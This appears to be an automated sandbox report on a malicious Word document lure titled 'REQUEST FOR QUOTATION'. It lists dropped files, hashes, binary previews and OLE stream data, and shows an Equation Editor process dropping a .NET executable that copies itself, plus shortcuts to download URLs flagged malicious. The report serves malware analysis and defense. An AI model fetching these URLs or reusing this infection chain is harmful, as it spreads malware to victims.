Preview:	......................>............................................1..........I.......F.......F.......B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...............................................................................................m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...\|...}...~............................&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...&...1...1...1...1...1...1...1...1...1..................................H...G....................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...................K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16921AF3-62CF-4133-BF32-5AC9DABD1716}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5CAAAFB4-F0F9-4C31-A792-CDE3FCF417F9}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	3.514021831071716
Encrypted:	false
SSDEEP:	96:IlhT+/4UhIImqb2Av+LXVUIsPb9K4DJTyc5xd5pqVawIGzQH9mwARU+uzj:WhKvmc2AGLlUDDJOc5xd5pG5UmpU+u
MD5:	9BC6D2736E6595BD0125335C6F724AD8
SHA1:	17AA64C7477846BBDD6BA3E489B03452C8BB078D
SHA-256:	C1A2EEF144E57B71C4E5D1D228E82F4413B996EFA61971808613025D61118510
SHA-512:	8B1440FD216C49943C1CF54E246C5E2CECF880FDB7789F4A7781D234EA207EE782DB925C0C6705CBA7DBC591AFF2A50904256DD80A2E09701C8E8AF1F0421C18
Malicious:	false
Preview:	................3.8.9.7.3.8.6.../.0...,.>.$.[.8.3.!.?.0.'.).-.\|.@.?.^.@.^.?.+.(.[.;.8.8.7.`.`.\|.4.!.2.!.?...?.#.\|...1.?.~.0.~.(._.%.).[.!.%.'.=.7.\|.?.?.~.>.%.?.?.6...3.8.\|.]...5.=..$.?./.?.<.,.4.-.&.^.?.1.0.<.%.?.1.?.?.+.-.6.\|.<...^.;.2.=.2.=.9...@.%.+.;.%._.\|.?.9.-.4.6.^.%./.]...<.[.%.5._.^.$.1...'.@.,.,.)...$.!...3.5.6.~.....?.9.8.(.2.$.?.'.=._.?.>.(.5.^.?...].<.2.2.1.3.8..?._.6...+.`.4.@./.7.\|.=.?./.(.?.!.4.?....^./...?...-.,.4...'......:.^.<.^.\|.9.6.[.#.7.6.~.,.0.~.`...?.%.4.).[.%._.?.&.&.5.0.^.#.5...9.2.1.%./.%.\|.'._.0.,.>.6...2.%.`.3.=.'.7.7.>.9.<.>.^.8..'.$.!.&.:.8.'.;.4...0.[.$.~...;.4.1.3...9.>.'...,.'.^.5.`.).`.1...:.0.?...).?.<.,...^.3.%...>.$.9.~.3...4...[.%.:.6.4.9.=.?.$.`.`.^._.].%.]...).@.%.....4.?.&.`.\|.].[.[.?...;.2./.-.@.@.<.2.&.4.?...,.,.?.^.=.0.1.7.?._.'...<.?.^.?.3.?.(.\|.).-.?.9.....-.0.(.].?.%.`.;.-.0.5.3.1.;...$.9.0.).1.~.-.#.+...\|.?...+.?.=......$...2.`.%.^...>.?.&./.>.>.7.[.8.7.?.).2.:.3.%.5.,.<.?.#.4.!.-.>.8.-...^._....._._.]._...3..-..;.].+.<.1./.,.?.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6675490F-F6CB-48A3-AD3A-48ADCD83D371}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	2.2123753075270276
Encrypted:	false
SSDEEP:	12:gApWmyayKpWmyayKpWmyayKpWmyaywyApWmyayKpWmyayKpWmyaK5ZTFC6N1WJGe:33oK3oK3oK3oa3oK3oK3Q5/vN1W5
MD5:	FCD640DC735BB554D7655757CF0A5057
SHA1:	85D97566764148FED4D4FC82306CCBF6324AB159
SHA-256:	59C9B000D04FC0E4BE3BA4196E9DB1B765D8D49F48250C9A58D40ACAADEE4305
SHA-512:	355AFAF94468E9E20C83E50172AA30D3432F93EB69A8E4733E3C8A298D3453985B761A119CD848BECDDD6A80CF72FB566F8F8B2393BC772C4CE61AB1ECA7CBAE
Malicious:	false
Preview:	........E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .......E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{72A20D22-7A0F-4729-A936-9D097CE4F45E}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025522682399296715
Encrypted:	false
SSDEEP:	6:I3DPcAHHvxggLRH/wDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPfP7cvYg3J/
MD5:	2A0836B980B90EC0096318322DD1168F
SHA1:	9277A21DF02204059C3BA3AFD2A91EB79CADA761
SHA-256:	C2F6F41D4EC9A36F779B027AE07213BD525747C2671ABCC6B53B404319123BF3
SHA-512:	664514E868F305F8B44DCEB20FD97BD523F7B195FA0C0EC5CE72F0945CC9CDB3E39B0E7FE327AA83913D638DC97902F197EBC9DC2AD86208D8F661B829B54BB5
Malicious:	false
Preview:	......M.eFy...zK.F.I.A.....S,...X.F...Fa.q..............................'....I..n.T.................WG....).z^.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{747CA762-B050-4BB5-BDEF-BB11A7D64050}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02566577083543993
Encrypted:	false
SSDEEP:	6:I3DPc7vI/vxggLRn2R8F2stGv5FRXv//4tfnRujlw//+GtluJ/eRuj:I3DP0mLaTM0vYg3J/
MD5:	FAB8881474C3EE52D22C122C0D4DD313
SHA1:	4DFB830381D6569AB6F190108962F67DC2BABDD1
SHA-256:	207017226D5EAD94C4E64E1BC6B8259C7C12D9BC6ED5516FCA4170E4BBB63D6A
SHA-512:	16A083B3A0210BB8DF6C1E7C327B8E0EEA057B3C938F7AA7C48EE30ACD99929F841CD38DDB0604F61572C751ED6C63F110B826517D112D0FE1505294E7F03A9F
Malicious:	false
Preview:	......M.eFy...z.......G.._.48(.S,...X.F...Fa.q............................p.0.<..@..@.E.h...........>...{H....}f.J.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\REQUEST FOR QUOTATION.docx.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Mon May 6 11:59:00 2024, length=302225, window=hide
Category:	dropped
Size (bytes):	1094
Entropy (8bit):	4.576623160749904
Encrypted:	false
SSDEEP:	24:8qqXO/XTBJ0xOqzD1FA4RrTF7eS+XFTFUDv3qkk7N:8PXO/XT4lzD7Rx2kiN
MD5:	68057F1CB1E9BF6776DE982D3A5C6509
SHA1:	DAFCD0335E358897E71D98684BA6428E891A9F24
SHA-256:	318F49181D5D55500932BD08C80F627D943624DE6752381035FE92E3E4CDE432
SHA-512:	C0F50FFBC9204810DB7B0F67D24CC07A7A893DC6626705D391A87975293B26149B1F1A87EE5BACFA617126DA9598B078597FF2590BA785FE6042FFF7EA907C71
Malicious:	false
Preview:	L..................F.... ...._..r...._..r...X...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X\g..user.8......QK.X.X\g...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Xag .REQUES~1.DOC..j.......WC..WC.*.........................R.E.Q.U.E.S.T. .F.O.R. .Q.U.O.T.A.T.I.O.N...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\114127\Users.user\Desktop\REQUEST FOR QUOTATION.docx.doc.5.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.E.Q.U.E.S.T. .F.O.R. .Q.U.O.T.A.T.I.O.N...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [doc]
Category:	dropped
Size (bytes):	125
Entropy (8bit):	5.043248036724947
Encrypted:	false
SSDEEP:	3:bDzS8PUqt0wdvw5Lf7SmX1Gvw5Lf7Sv:bPSGU0dC34C3c
MD5:	7A03F41131FBE7C7F9F64A5CF95297BE
SHA1:	2A21696EBC97ACE142FA0FE9CD96F1F11D4BC3BE
SHA-256:	B32CE78CD7861858E4E6D6FF66935C48393375E4D7303E2EE0C0953D0852EDEE
SHA-512:	E3F8BE5FD77470F7A4852315950F17982AE984876C6D11427F6594CED34CFE3E356A6E34A90FFE119863F1D6B403E15ACD2F7E588A32F8B20A840EC79422AB68
Malicious:	false
Preview:	[folders]..u7xc.url=0..rz on 104.168.33.34.url=0..REQUEST FOR QUOTATION.docx.LNK=0..[doc]..REQUEST FOR QUOTATION.docx.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\rz on 104.168.33.34.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://104.168.33.34/xampp/rzz/rz/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.706238928653389
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/GN8DVKP9y:HRYFVm/9Ds0
MD5:	8986662C6BAF45AADDC74DA84EB9D4DA
SHA1:	BB8B9CF711FB51109C1C5B6D30107C029E8C9614
SHA-256:	E64F5BEB601417C17B1410095B8A6540AB2073B4F26CA884BEBCDB6D8ADB30D3
SHA-512:	FC2C9EC73558E20CEBA8E98AF8778CEED40D3B2756D4AF8183824CAE544E2E9E1AE7A2FA0B7835F96E8723B975781D0D0820A9B8BF09C9245B1DDC245B0ACD76
Malicious:	true
Preview:	[InternetShortcut]..URL=http://104.168.33.34/xampp/rzz/rz/..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\u7xc.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://wbze.de/u7xc>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	45
Entropy (8bit):	4.552638373963222
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/0HfS5n:HRYFVm/gM
MD5:	B4B4598DF9402053D6BFAFF702F5E6EF
SHA1:	214C8D27D6EE4BAA15E2EC9F54B36502A45EA068
SHA-256:	AAD6EF302CCB3AE2D069123B9D91147B3CE76F7A289EABCDF365C137B075C2F8
SHA-512:	03D4CC1D4BFF916B2F975C9BD2294506C43845BD6AAB3CCA934B8305A69CDEC1B520D1416D9D061A06D09171428146156273A068F1EFC5FFD1CE2273576062A9
Malicious:	true
Preview:	[InternetShortcut]..URL=http://wbze.de/u7xc..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\html.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	753152
Entropy (8bit):	7.820038309246593
Encrypted:	false
SSDEEP:	12288:nYiAEfD23qCSipEKYiE0JCv9XX8qKEcfldi8+LxfIqpW87PKYUsT4e9LIu:YRE72aCShZwJ6ONdi8IfI0zUscc
MD5:	4C8B56B125AE41293AA6028204D44268
SHA1:	21482DB39F9240559957F1FCCC61017D6845407E
SHA-256:	1809301D773302B15457BFA5830B9EEBFBEC989867DB46E9A06882AF386DF130
SHA-512:	BF2D7F663BB2B2FC4AF36524839EE243836B7AB3692861D30F74EE11EB10A4FB05E7E3879EC196750EBF8B05C5284F559C7BC41331D74E105E208101F019A76E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 37%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..j............... ........@.. ....................................@.................................Y...O....................................h..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............\|..............@..B........................H........X...F......D.......X............................................0..i........r...p}.....r...p}.....(........}......=(...+..,...(......+,..>(...+..,...(......+...<(...+..,...(......*....0.. .........{......O...%..=.o........o....... (...+..9........O...%.. .o........o...........O...%....o...........(......~......o .......,n.~......o!.....~......o"....Q...............,=....+&......o....sO........oQ...}........X.......i.Y......-...+...r...p}............r;..p}........+...

C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exe

Download File

Process:	C:\Users\user\AppData\Roaming\html.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	753152
Entropy (8bit):	7.820038309246593
Encrypted:	false
SSDEEP:	12288:nYiAEfD23qCSipEKYiE0JCv9XX8qKEcfldi8+LxfIqpW87PKYUsT4e9LIu:YRE72aCShZwJ6ONdi8IfI0zUscc
MD5:	4C8B56B125AE41293AA6028204D44268
SHA1:	21482DB39F9240559957F1FCCC61017D6845407E
SHA-256:	1809301D773302B15457BFA5830B9EEBFBEC989867DB46E9A06882AF386DF130
SHA-512:	BF2D7F663BB2B2FC4AF36524839EE243836B7AB3692861D30F74EE11EB10A4FB05E7E3879EC196750EBF8B05C5284F559C7BC41331D74E105E208101F019A76E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 37%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..j............... ........@.. ....................................@.................................Y...O....................................h..p............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............\|..............@..B........................H........X...F......D.......X............................................0..i........r...p}.....r...p}.....(........}......=(...+..,...(......+,..>(...+..,...(......+...<(...+..,...(......*....0.. .........{......O...%..=.o........o....... (...+..9........O...%.. .o........o...........O...%....o...........(......~......o .......,n.~......o!.....~......o"....Q...............,=....+&......o....sO........oQ...}........X.......i.Y......-...+...r...p}............r;..p}........+...

C:\Users\user\Desktop\~$QUEST FOR QUOTATION.docx.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.986634324655397
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	REQUEST FOR QUOTATION.docx.doc
File size:	302'225 bytes
MD5:	d03e818c9b5e10f20be12369b980dcf4
SHA1:	1b06f7e8918e40fe1fee605fdeb8fa008098b34d
SHA256:	93c86de90e7a282f6999b7233cbb1b815bbdb8f1f103481b6f8ac0def74f88fe
SHA512:	dcd284d6ed989062b69343add0dca6fb97e9072463fcb291be69ca9104a690c188673641c052d973e2b04c237a50282542fc2fb94fb06680e211b5e7b381d6a8
SSDEEP:	6144:eGm/46IXMfqFO6S951ndPJofYeuCf5fbhCMGcfz+Cx:eGmgcfq4h1dPqfYeuCf5fVZlf/
TLSH:	C15412FB37D0F919EC6F3587C4A54D41C137AA8168850C283A39A35F47B61EAE7708B6
File Content Preview:	PK.........p.X.4..m...........[Content_Types].xmlUT.....8f..8f..8f.T.n.0..W.?D....CUU..]......{.n..6..wL(.* m.K...[f<q...[..........p+....m....,Df.S.@I...pp}.......&.d....4..h.... R[.Y.W?....6.z...RnM....4....5...=..s....d.M]..sNI.".ta....... ,.k..V..z.

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	7

OLE File "REQUEST FOR QUOTATION.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:	91974
Keywords:
Template:	Normal.dotm
Last Saved By:	91974
Revion Number:	18
Total Edit Time:	5
Create Time:	2023-11-10T01:33:00Z
Last Saved Time:	2024-05-03T01:42:00Z
Number of Pages:	1
Number of Words:	34
Number of Characters:	194
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 01 00

Stream Path: CONTENTS, File Type: PDF document, version 1.5, 1 pages (zip deflate encoded), Stream Size: 30959

General
Stream Path:	CONTENTS
CLSID:
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Stream Size:	30959
Entropy:	7.915983867366053
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R \| ( ( " * " < 6 ] . . { n n \| . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69

OLE File "REQUEST FOR QUOTATION.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:	91974
Keywords:
Template:	Normal.dotm
Last Saved By:	91974
Revion Number:	18
Total Edit Time:	5
Create Time:	2023-11-10T01:33:00Z
Last Saved Time:	2024-05-03T01:42:00Z
Number of Pages:	1
Number of Words:	34
Number of Characters:	194
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 01 00

Stream Path: CONTENTS, File Type: PDF document, version 1.5, 1 pages (zip deflate encoded), Stream Size: 30959

General
Stream Path:	CONTENTS
CLSID:
File Type:	PDF document, version 1.5, 1 pages (zip deflate encoded)
Stream Size:	30959
Entropy:	7.915983867366053
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 5 . % . 3 0 o b j . < < / C o l o r S p a c e / D e v i c e G r a y / S u b t y p e / I m a g e / H e i g h t 7 2 / F i l t e r / F l a t e D e c o d e / T y p e / X O b j e c t / W i d t h 2 5 5 / L e n g t h 2 0 8 1 / B i t s P e r C o m p o n e n t 8 > > s t r e a m . x { P . U . & B & o 1 b F P s . R 2 . . . . * Y 6 3 . . # N L 8 T X R \| ( ( " * " < 6 ] . . { n n \| . . s ` . . , b . E . . . q . ( ` o ^ E Y . 7 N Y ] . H X ^ 3 n . . " K . . . . . . * o " . E ( > . . . . . . .
Data Raw:	25 50 44 46 2d 31 2e 35 0a 25 e2 e3 cf d3 0a 33 20 30 20 6f 62 6a 0a 3c 3c 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 47 72 61 79 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 48 65 69 67 68 74 20 37 32 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 57 69 64 74 68 20 32 35 35 2f 4c 65 6e 67 74 68 20 32 30 38 31 2f 42 69

OLE File "REQUEST FOR QUOTATION.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:	91974
Keywords:
Template:	Normal.dotm
Last Saved By:	91974
Revion Number:	18
Total Edit Time:	5
Create Time:	2023-11-10T01:33:00Z
Last Saved Time:	2024-05-03T01:42:00Z
Number of Pages:	1
Number of Words:	34
Number of Characters:	194
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 01 00

